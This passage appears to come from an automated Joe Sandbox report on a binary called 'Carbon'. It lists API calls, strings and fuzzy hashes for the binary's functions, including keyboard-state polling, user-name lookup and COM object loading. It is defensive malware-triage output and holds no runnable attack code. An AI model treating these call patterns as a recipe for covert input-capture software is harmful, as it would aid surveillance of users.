                                                            • Instruction Fuzzy Hash: 4D21E2317052149FD710AF3AC844B1A7BE9FF85314F59806CE84A8B3A1DB75ED42CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0094E526
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID: X64
                                                            • API String ID: 2645101109-893830106
                                                            • Opcode ID: a0f8a15a2a09b59c3cc270cf5a7163880d5ee54912f900cccb1b5710e64c929d
                                                            • Instruction ID: bd253cec62bf6055ea254b5e87b27cd0c951c43f96a7baf23ea07d4b8e5140d5
                                                            • Opcode Fuzzy Hash: a0f8a15a2a09b59c3cc270cf5a7163880d5ee54912f900cccb1b5710e64c929d
                                                            • Instruction Fuzzy Hash: EBD0E9B581A12DEBCF90CB90EC88DD977BCBB04304F144955F506A6140D77496499B10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?), ref: 00964667
                                                            • _wcslen.LIBCMT ref: 00964672
                                                            • _wcslen.LIBCMT ref: 009646C9
                                                            • _wcslen.LIBCMT ref: 00964707
                                                            • GetDriveTypeW.KERNEL32(?), ref: 00964745
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0096478D
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009647C8
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009647F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 1839972693-4113822522
                                                            • Opcode ID: f8adf60d45383c9a2aaf5bf159838acc11a365328135c49d8884d31536472652
                                                            • Instruction ID: 85c422b13faa031eec0cabbf551375bb48b0ef8c0a5a6d5bcc5d23648db4661a
                                                            • Opcode Fuzzy Hash: f8adf60d45383c9a2aaf5bf159838acc11a365328135c49d8884d31536472652
                                                            • Instruction Fuzzy Hash: F271C0726083159FC710EF78C88086ABBE9FF98768F104A2DF99597251E730DD45CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadIconW.USER32(00000063), ref: 00956127
                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00956139
                                                            • SetWindowTextW.USER32(?,?), ref: 00956150
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00956165
                                                            • SetWindowTextW.USER32(00000000,?), ref: 0095616B
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0095617B
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00956181
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 009561A2
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 009561BC
                                                            • GetWindowRect.USER32(?,?), ref: 009561C5
                                                            • _wcslen.LIBCMT ref: 0095622C
                                                            • SetWindowTextW.USER32(?,?), ref: 00956268
                                                            • GetDesktopWindow.USER32 ref: 0095626E
                                                            • GetWindowRect.USER32(00000000), ref: 00956275
                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 009562CC
                                                            • GetClientRect.USER32(?,?), ref: 009562D9
                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 009562FE
                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00956328
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                            • String ID:
                                                            • API String ID: 895679908-0
                                                            • Opcode ID: 8c341e5a9a7b88785c595f84b247376ffc7eacebe95aa45db25359f243a77c4e
                                                            • Instruction ID: ce78f74328e7d4e4a09336ccb65aa4a05841336bda73bd8df97aec3183f7194e
                                                            • Opcode Fuzzy Hash: 8c341e5a9a7b88785c595f84b247376ffc7eacebe95aa45db25359f243a77c4e
                                                            • Instruction Fuzzy Hash: F5719D31904709AFDB20DFA9CE45AAEBBF9FF48705F100918E996E32A0D775E944CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 009705AE
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 009705B9
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 009705C4
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 009705CF
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 009705DA
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 009705E5
                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 009705F0
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 009705FB
                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00970606
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00970611
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 0097061C
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00970627
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00970632
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 0097063D
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00970648
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00970653
                                                            • GetCursorInfo.USER32(?), ref: 00970663
                                                            • GetLastError.KERNEL32 ref: 009706A5
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                            • String ID:
                                                            • API String ID: 3215588206-0
                                                            • Opcode ID: 59f8b1c7de6d8f605a24bb9466bb9ca3dc8c436836e0769c090e9fdd2add3ad4
                                                            • Instruction ID: fd2170af5d758813e37a5b6bb6a46d5ac15ebb8f39c41b133876d78293edf0e6
                                                            • Opcode Fuzzy Hash: 59f8b1c7de6d8f605a24bb9466bb9ca3dc8c436836e0769c090e9fdd2add3ad4
                                                            • Instruction Fuzzy Hash: C04166B1D08319AADB10DFBA8C8585EBFE8FF44754B50852AE11DE7281DA78D901CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00910416
                                                              • Part of subcall function 0091043D: InitializeCriticalSectionAndSpinCount.KERNEL32(009C16FC,00000FA0,41B96570,?,?,?,?,00932703,000000FF), ref: 0091046C
                                                              • Part of subcall function 0091043D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00932703,000000FF), ref: 00910477
                                                              • Part of subcall function 0091043D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00932703,000000FF), ref: 00910488
                                                              • Part of subcall function 0091043D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0091049E
                                                              • Part of subcall function 0091043D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 009104AC
                                                              • Part of subcall function 0091043D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 009104BA
                                                              • Part of subcall function 0091043D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009104E5
                                                              • Part of subcall function 0091043D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009104F0
                                                            • ___scrt_fastfail.LIBCMT ref: 00910437
                                                              • Part of subcall function 009103F3: __onexit.LIBCMT ref: 009103F9
                                                            Strings
                                                            • WakeAllConditionVariable, xrefs: 009104B2
                                                            • SleepConditionVariableCS, xrefs: 009104A4
                                                            • kernel32.dll, xrefs: 00910483
                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00910472
                                                            • InitializeConditionVariable, xrefs: 00910498
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                            • API String ID: 66158676-1714406822
                                                            • Opcode ID: 2926eb133c77bd211b87a586c026469614a0148bdeb066d276ea934c438b32e1
                                                            • Instruction ID: 3373a89f18be3e07e5083f3bcdb31779fa9dbd6d6233d4fca334181b3dc7493f
                                                            • Opcode Fuzzy Hash: 2926eb133c77bd211b87a586c026469614a0148bdeb066d276ea934c438b32e1
                                                            • Instruction Fuzzy Hash: 2B210A32B5D3196FD7142BA89C49FA93798EFC5F65F000129F505972D0DBF598C08A90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 0095A713
                                                            • SetKeyboardState.USER32(?), ref: 0095A77E
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 0095A79E
                                                            • GetKeyState.USER32(000000A0), ref: 0095A7B5
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 0095A7E4
                                                            • GetKeyState.USER32(000000A1), ref: 0095A7F5
                                                            • GetAsyncKeyState.USER32(00000011), ref: 0095A821
                                                            • GetKeyState.USER32(00000011), ref: 0095A82F
                                                            • GetAsyncKeyState.USER32(00000012), ref: 0095A858
                                                            • GetKeyState.USER32(00000012), ref: 0095A866
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 0095A88F
                                                            • GetKeyState.USER32(0000005B), ref: 0095A89D
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 80c7e08aaebc8fb813dfd15dbc94b5deb756921728592f12f2f428be191b3e11
                                                            • Instruction ID: 00e3e3fb93825a1a47482700f8c4c4ba3407cc128b57c03bed42e09b8fba46a8
                                                            • Opcode Fuzzy Hash: 80c7e08aaebc8fb813dfd15dbc94b5deb756921728592f12f2f428be191b3e11
                                                            • Instruction Fuzzy Hash: F351FA3090478829FB34DB7288157EABFF89F11381F084699CDC65B1C2DA549E8CCB67
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 009563DB
                                                            • GetWindowRect.USER32(00000000,?), ref: 009563F4
                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00956452
                                                            • GetDlgItem.USER32(?,00000002), ref: 00956462
                                                            • GetWindowRect.USER32(00000000,?), ref: 00956474
                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 009564C8
                                                            • GetDlgItem.USER32(?,000003E9), ref: 009564D6
                                                            • GetWindowRect.USER32(00000000,?), ref: 009564E8
                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 0095652A
                                                            • GetDlgItem.USER32(?,000003EA), ref: 0095653D
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00956553
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00956560
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: 96e93356d49783f9101f185302817ed93cfad1a0ec5f5643d39526c644c2f81b
                                                            • Instruction ID: d6abcd1ac03ff72e0a8507dd8b65df3ffe59320aede06c30543523a453b050af
                                                            • Opcode Fuzzy Hash: 96e93356d49783f9101f185302817ed93cfad1a0ec5f5643d39526c644c2f81b
                                                            • Instruction Fuzzy Hash: 6D512EB1A11209AFDF08CF69DD85AAEBBB9FB48311F508128F919E72D0E7709D04CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 009743E3
                                                            • CoInitialize.OLE32(00000000), ref: 00974411
                                                            • CoUninitialize.OLE32 ref: 0097441B
                                                            • _wcslen.LIBCMT ref: 009744B4
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00974538
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 0097465C
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00974695
                                                            • CoGetObject.OLE32(?,00000000,00990B80,?), ref: 009746B4
                                                            • SetErrorMode.KERNEL32(00000000), ref: 009746C7
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0097474B
                                                            • VariantClear.OLEAUT32(?), ref: 0097475F
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                            • String ID:
                                                            • API String ID: 429561992-0
                                                            • Opcode ID: 284c225f62705f3c7e1acbeb8e8679f003e8f9f99a50051cfc288d2fe4145527
                                                            • Instruction ID: bbaf2b98a66bbc8a2b5f0373ba8f631cf1af35095d1772d2b92a9005275d51f4
                                                            • Opcode Fuzzy Hash: 284c225f62705f3c7e1acbeb8e8679f003e8f9f99a50051cfc288d2fe4145527
                                                            • Instruction Fuzzy Hash: 78C136726083059FD700DF68C88492BB7E9FF89748F14895DF99A9B261D730ED05CB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 00968262
                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009682FE
                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00968312
                                                            • CoCreateInstance.OLE32(00990CF0,00000000,00000001,009B7E7C,?), ref: 0096835E
                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009683E3
                                                            • CoTaskMemFree.OLE32(?,?), ref: 0096843B
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 009684C6
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009684E9
                                                            • CoTaskMemFree.OLE32(00000000), ref: 009684F0
                                                            • CoTaskMemFree.OLE32(00000000), ref: 00968545
                                                            • CoUninitialize.OLE32 ref: 0096854B
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                            • String ID:
                                                            • API String ID: 2762341140-0
                                                            • Opcode ID: 3a94f4847d78085f4cfea8c6f5f472e21bc20f3ad0c8bce26b829a66642247f8
                                                            • Instruction ID: 0da3548f5b90a21d74c60650bec685b88d464360927e72039051dbc3f71426d6
                                                            • Opcode Fuzzy Hash: 3a94f4847d78085f4cfea8c6f5f472e21bc20f3ad0c8bce26b829a66642247f8
                                                            • Instruction Fuzzy Hash: ABC10775A00219AFCB14DFA4C884DAEBBB9FF48344B148599F51ADB361DB30EE45CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00950136
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 0095018F
                                                            • VariantInit.OLEAUT32(?), ref: 009501A1
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 009501C1
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00950214
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00950228
                                                            • VariantClear.OLEAUT32(?), ref: 0095023D
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 0095024A
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00950253
                                                            • VariantClear.OLEAUT32(?), ref: 00950265
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00950270
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: f7ea15c6d275894f9222c46358713ae23319d7ec0978367c3bdcbee57c9f982c
                                                            • Instruction ID: b10b66bc00ce7deb51279ff55f3862c12a2ebbc8295c9555c125f08308a6e34a
                                                            • Opcode Fuzzy Hash: f7ea15c6d275894f9222c46358713ae23319d7ec0978367c3bdcbee57c9f982c
                                                            • Instruction Fuzzy Hash: E7417231A04219DFCF04DF69D8489AEBBB9FF48355F008029E915A73A1DB30A945CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateMenu.USER32 ref: 00984437
                                                            • SetMenu.USER32(?,00000000), ref: 00984446
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009844CE
                                                            • IsMenu.USER32(?), ref: 009844E2
                                                            • CreatePopupMenu.USER32 ref: 009844EC
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00984519
                                                            • DrawMenuBar.USER32 ref: 00984521
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                            • String ID: 0$F
                                                            • API String ID: 161812096-3044882817
                                                            • Opcode ID: 63f40451c27d14fdf09e4a3305a4f7ed0c04b954340b226bff03fa1257567c76
                                                            • Instruction ID: d237ca251fb2617141a2e53f45b81f4878cee0635f6b0471f79f5a384fc828c0
                                                            • Opcode Fuzzy Hash: 63f40451c27d14fdf09e4a3305a4f7ed0c04b954340b226bff03fa1257567c76
                                                            • Instruction Fuzzy Hash: F44115B5A1220AAFDF14DF64E884AAE7BB9FF49314F140029F945973A0D770A910DF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 00954392: GetClassNameW.USER32(?,?,000000FF), ref: 009543B5
                                                            • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00952646
                                                            • GetDlgCtrlID.USER32 ref: 00952651
                                                            • GetParent.USER32 ref: 0095266D
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00952670
                                                            • GetDlgCtrlID.USER32(?), ref: 00952679
                                                            • GetParent.USER32(?), ref: 0095268D
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00952690
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 711023334-1403004172
                                                            • Opcode ID: c30a18e878ea9c7e96d2d529926bc260910181a7662efe6a0bbe4484cb07e2cb
                                                            • Instruction ID: c17a0cb2ba36702658cb55225c16e83076bf79b1ee95703378882fd8969e02bc
                                                            • Opcode Fuzzy Hash: c30a18e878ea9c7e96d2d529926bc260910181a7662efe6a0bbe4484cb07e2cb
                                                            • Instruction Fuzzy Hash: 662104B4D05118BBCF04EFA4CC84EEEBBB8EF05320F004506B951932E1DA785809EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 0098425B
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0098425E
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00984285
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009842A8
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00984320
                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 0098436A
                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00984385
                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 009843A0
                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 009843B4
                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 009843D1
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
